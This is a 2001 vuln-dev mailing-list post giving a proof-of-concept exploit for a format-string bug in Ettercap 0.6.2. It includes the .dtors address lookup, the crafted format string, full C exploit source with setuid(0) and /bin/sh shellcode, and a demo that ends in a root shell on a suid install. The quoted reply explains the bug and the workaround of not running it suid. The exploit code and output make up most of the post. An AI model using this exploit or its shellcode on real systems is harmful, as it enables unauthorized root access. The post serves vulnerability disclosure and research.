Proof of concept for the format bug in Ettercap 0.6.2

From: BAILLEUX Christophe (cb@t-online.fr)
Date: 12/05/01


Date: Wed, 5 Dec 2001 12:25:00 +0100 (CET)
From: BAILLEUX Christophe <cb@t-online.fr>
To: Blue Boar <BlueBoar@thievco.com>


 Firstly, let's retrieve the address of the section .dtors:

 cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap

 /usr/local/sbin/ettercap: file format elf32-i386

 Contents of section .dtors:
 8119a70 ffffffff 00000000 ........
 cb@tshaw$

 So the fmt string is composed of:

 - "000" for allignment.

 - "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we
    expect to write (here .dtors + 4 -- 0x8119a74.)

 - "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode.

 This format string was built using fmtbuilder:
 http://minimum.inria.fr/~raynal/index.php3?page=501

 ---- ettercap-exp.c ----

 #include <stdio.h>
 #include <stdlib.h>

 int main()
 {

         char buf[1024];

         char shellcode[] =
           /* setuid(0) */
           "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
           /* Aleph 1 shellcode */
           "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
           "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
           "\x80\xe8\xdc\xff\xff\xff/bin/sh";

         char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn";

         memset(buf, 0x90, 1024);
         memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode));

         setenv("SHELLCODE", buf, 1);

         execl("/usr/local/sbin/ettercap", "ettercap", fmt, 0x0);
 }

 ---- ettercap-exp.c ----

 Demo:

 This demo is made with a suid root version.

 cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
 cb@tshaw$ ./ettercap-exp

 ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...

 may the packets be with you...

 Invalid host address
 000tv00000000000000000000000000000000000000000000000000000000000000000000
 0000000000000000000000000000000000000000000000000000000000000000000000000
 0000000000000000000000000000000000000000000000000000000000000000000000000
 ....snip....
 0000000000000000000000000000000000000000000000081020c0 !!

 sh-2.04# id
 uid=0(root) groups=100(users)

Best regards,

--
Christophe Bailleux - Network & System Security Engineer
Club-Internet / T-Online France
Voice:+33-(0)1-5545-4789 - mailto:cb@t-online.fr

On Tue, 4 Dec 2001, Blue Boar wrote:

> Goobles sent another post to vuln-dev today, which was rejected due
> to personal attacks in their note. I want to check out their claim,
> however. If you want to see their original posting, it's on their
> web site like the others, I'm sure. It includes a claimed exploit,
> which cannot be posted due to their wishes that it not be separated
> from the advisory. If someone wants to write an independent exploit,
> I'd be happy to post that, provided it follows the list rules,
> of course.
>
> Here's the basic problem:
>
> ettercap %x%x%x%x%x%x%x
> ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
>
> may the packets be with you...
>
>
> Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
>
> Gobbles' point is that there is an option to configure it suid,
> so this could be exploitable when that is used. Why someone
> would want a packet capture program to be used by non-priv users..
> Well, I'm sure there's a good reason somewhere in the world.
>
> Is anyone using it that way? Are there OS distributions that come
> with Ettercap installed by default? And, of course, is it suid?
> (I can't imagine it would be.) The workaround is obvious, don't
> run it suid or allow remote users who do not already have a shell
> to execute it with a command-line parameter (such as via a web
> interface.)
>
> BB
>